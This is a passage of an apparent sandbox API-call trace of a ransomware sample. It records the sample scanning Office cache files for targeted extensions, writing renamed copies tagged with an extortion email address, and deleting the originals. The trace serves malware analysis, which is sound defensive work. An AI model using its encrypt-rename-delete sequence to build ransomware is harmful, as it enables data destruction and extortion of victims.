lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.555] lstrlenW (lpString=".bz2") returned 4 [0034.555] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.555] lstrlenW (lpString=".7z") returned 3 [0034.555] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.555] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0034.555] lstrlenW (lpString=".dbf") returned 4 [0034.555] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.555] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0034.555] lstrlenW (lpString=".1cd") returned 4 [0034.555] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.555] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0034.555] lstrlenW (lpString=".jpg") returned 4 [0034.555] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.555] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0034.555] lstrlenW (lpString="GrooveMUI.xml") returned 13 [0034.555] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0034.557] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=913) returned 1 [0034.557] CloseHandle (hObject=0x178) returned 1 [0034.557] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml")) returned 0x2020 [0034.557] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0034.557] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0034.557] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.557] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.558] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0034.558] GetLastError () returned 0x0 [0034.558] ReadFile (in: hFile=0x178, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x391, lpOverlapped=0x0) returned 1 [0034.559] WriteFile (in: hFile=0x17c, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x3a0, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x3a0, lpOverlapped=0x0) returned 1 [0034.560] ReadFile (in: hFile=0x178, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0034.560] WriteFile (in: hFile=0x17c, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xee, lpOverlapped=0x0) returned 1 [0034.560] SetEndOfFile (hFile=0x17c) returned 1 [0034.560] CloseHandle (hObject=0x17c) returned 1 [0034.561] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.561] SetEndOfFile (hFile=0x178) returned 1 [0034.562] CloseHandle (hObject=0x178) returned 1 [0034.562] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0034.562] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml")) returned 1 [0034.562] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0034.562] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0034.562] lstrlenW (lpString=".doc") returned 4 [0034.562] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.562] lstrlenW (lpString=".docx") returned 5 [0034.562] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.562] lstrlenW (lpString=".pdf") returned 4 [0034.562] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.562] lstrlenW (lpString=".xls") returned 4 [0034.563] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.563] lstrlenW (lpString=".xlsx") returned 5 [0034.563] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.563] lstrlenW (lpString=".ppt") returned 4 [0034.563] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.563] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0034.563] lstrlenW (lpString=".zip") returned 4 [0034.563] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.563] lstrlenW (lpString=".rar") returned 4 [0034.563] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.563] lstrlenW (lpString=".bz2") returned 4 [0034.563] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.563] lstrlenW (lpString=".7z") returned 3 [0034.563] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.563] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0034.563] lstrlenW (lpString=".dbf") returned 4 [0034.563] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.563] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0034.563] lstrlenW (lpString=".1cd") returned 4 [0034.563] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.563] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0034.563] lstrlenW (lpString=".jpg") returned 4 [0034.563] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.563] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0034.563] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0034.563] lstrlenW (lpString=".doc") returned 4 [0034.563] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.563] lstrlenW (lpString=".docx") returned 5 [0034.563] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.563] lstrlenW (lpString=".pdf") returned 4 [0034.563] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.563] lstrlenW (lpString=".xls") returned 4 [0034.564] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.564] lstrlenW (lpString=".xlsx") returned 5 [0034.564] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.564] lstrlenW (lpString=".ppt") returned 4 [0034.564] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.564] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0034.564] lstrlenW (lpString=".zip") returned 4 [0034.564] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.564] lstrlenW (lpString=".rar") returned 4 [0034.564] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.564] lstrlenW (lpString=".bz2") returned 4 [0034.564] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.564] lstrlenW (lpString=".7z") returned 3 [0034.564] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.564] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0034.564] lstrlenW (lpString=".dbf") returned 4 [0034.564] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.564] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0034.564] lstrlenW (lpString=".1cd") returned 4 [0034.564] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.564] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0034.564] lstrlenW (lpString=".jpg") returned 4 [0034.564] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.564] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0034.564] lstrlenW (lpString="Setup.xml") returned 9 [0034.564] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0034.565] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=1452) returned 1 [0034.565] CloseHandle (hObject=0x178) returned 1 [0034.565] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0034.565] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0034.565] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0034.565] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.565] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.565] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0034.566] GetLastError () returned 0x0 [0034.566] ReadFile (in: hFile=0x178, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x5ac, lpOverlapped=0x0) returned 1 [0034.567] WriteFile (in: hFile=0x17c, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0034.568] ReadFile (in: hFile=0x178, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0034.568] WriteFile (in: hFile=0x17c, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xe6, lpOverlapped=0x0) returned 1 [0034.568] SetEndOfFile (hFile=0x17c) returned 1 [0034.568] CloseHandle (hObject=0x17c) returned 1 [0034.569] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.569] SetEndOfFile (hFile=0x178) returned 1 [0034.570] CloseHandle (hObject=0x178) returned 1 [0034.570] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0034.570] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0034.570] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.570] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.570] lstrlenW (lpString=".doc") returned 4 [0034.571] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.571] lstrlenW (lpString=".docx") returned 5 [0034.571] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.571] lstrlenW (lpString=".pdf") returned 4 [0034.571] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.571] lstrlenW (lpString=".xls") returned 4 [0034.571] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.571] lstrlenW (lpString=".xlsx") returned 5 [0034.571] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.571] lstrlenW (lpString=".ppt") returned 4 [0034.571] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.571] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.571] lstrlenW (lpString=".zip") returned 4 [0034.571] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.571] lstrlenW (lpString=".rar") returned 4 [0034.571] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.571] lstrlenW (lpString=".bz2") returned 4 [0034.571] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.571] lstrlenW (lpString=".7z") returned 3 [0034.571] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.571] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.571] lstrlenW (lpString=".dbf") returned 4 [0034.571] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.571] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.571] lstrlenW (lpString=".1cd") returned 4 [0034.571] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.571] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.571] lstrlenW (lpString=".jpg") returned 4 [0034.571] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.571] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.571] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.571] lstrlenW (lpString=".doc") returned 4 [0034.572] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.572] lstrlenW (lpString=".docx") returned 5 [0034.572] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.572] lstrlenW (lpString=".pdf") returned 4 [0034.572] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.572] lstrlenW (lpString=".xls") returned 4 [0034.572] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.572] lstrlenW (lpString=".xlsx") returned 5 [0034.572] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.572] lstrlenW (lpString=".ppt") returned 4 [0034.572] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.572] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.572] lstrlenW (lpString=".zip") returned 4 [0034.572] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.572] lstrlenW (lpString=".rar") returned 4 [0034.572] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.572] lstrlenW (lpString=".bz2") returned 4 [0034.572] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.572] lstrlenW (lpString=".7z") returned 3 [0034.572] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.572] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.572] lstrlenW (lpString=".dbf") returned 4 [0034.572] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.572] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.572] lstrlenW (lpString=".1cd") returned 4 [0034.572] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.572] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.572] lstrlenW (lpString=".jpg") returned 4 [0034.572] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.573] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0034.573] lstrlenW (lpString="branding.xml") returned 12 [0034.573] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0034.573] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=596341) returned 1 [0034.574] CloseHandle (hObject=0x170) returned 1 [0034.574] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml")) returned 0x2020 [0034.574] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0034.574] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0034.574] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.574] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.574] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0034.574] GetLastError () returned 0x0 [0034.574] ReadFile (in: hFile=0x170, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x91975, lpOverlapped=0x0) returned 1 [0034.779] WriteFile (in: hFile=0x178, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x91980, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x91980, lpOverlapped=0x0) returned 1 [0034.792] ReadFile (in: hFile=0x170, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0034.793] WriteFile (in: hFile=0x178, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0034.793] SetEndOfFile (hFile=0x178) returned 1 [0034.793] CloseHandle (hObject=0x178) returned 1 [0034.799] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.799] SetEndOfFile (hFile=0x170) returned 1 [0034.804] CloseHandle (hObject=0x170) returned 1 [0034.804] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0034.810] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml")) returned 1 [0034.811] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0034.811] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0034.811] lstrlenW (lpString=".doc") returned 4 [0034.811] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.811] lstrlenW (lpString=".docx") returned 5 [0034.811] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1 [0034.811] lstrlenW (lpString=".pdf") returned 4 [0034.811] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.811] lstrlenW (lpString=".xls") returned 4 [0034.811] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.811] lstrlenW (lpString=".xlsx") returned 5 [0034.811] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1 [0034.811] lstrlenW (lpString=".ppt") returned 4 [0034.811] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.811] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0034.811] lstrlenW (lpString=".zip") returned 4 [0034.811] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.811] lstrlenW (lpString=".rar") returned 4 [0034.811] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.811] lstrlenW (lpString=".bz2") returned 4 [0034.811] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.811] lstrlenW (lpString=".7z") returned 3 [0034.811] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.811] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0034.811] lstrlenW (lpString=".dbf") returned 4 [0034.811] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.811] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0034.811] lstrlenW (lpString=".1cd") returned 4 [0034.812] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.812] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0034.812] lstrlenW (lpString=".jpg") returned 4 [0034.812] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.812] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0034.812] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0034.812] lstrlenW (lpString=".doc") returned 4 [0034.812] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.812] lstrlenW (lpString=".docx") returned 5 [0034.812] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1 [0034.812] lstrlenW (lpString=".pdf") returned 4 [0034.812] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.812] lstrlenW (lpString=".xls") returned 4 [0034.812] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.812] lstrlenW (lpString=".xlsx") returned 5 [0034.812] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1 [0034.812] lstrlenW (lpString=".ppt") returned 4 [0034.812] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.812] lstrlenW (lpString="C:\\MSOCache\\All 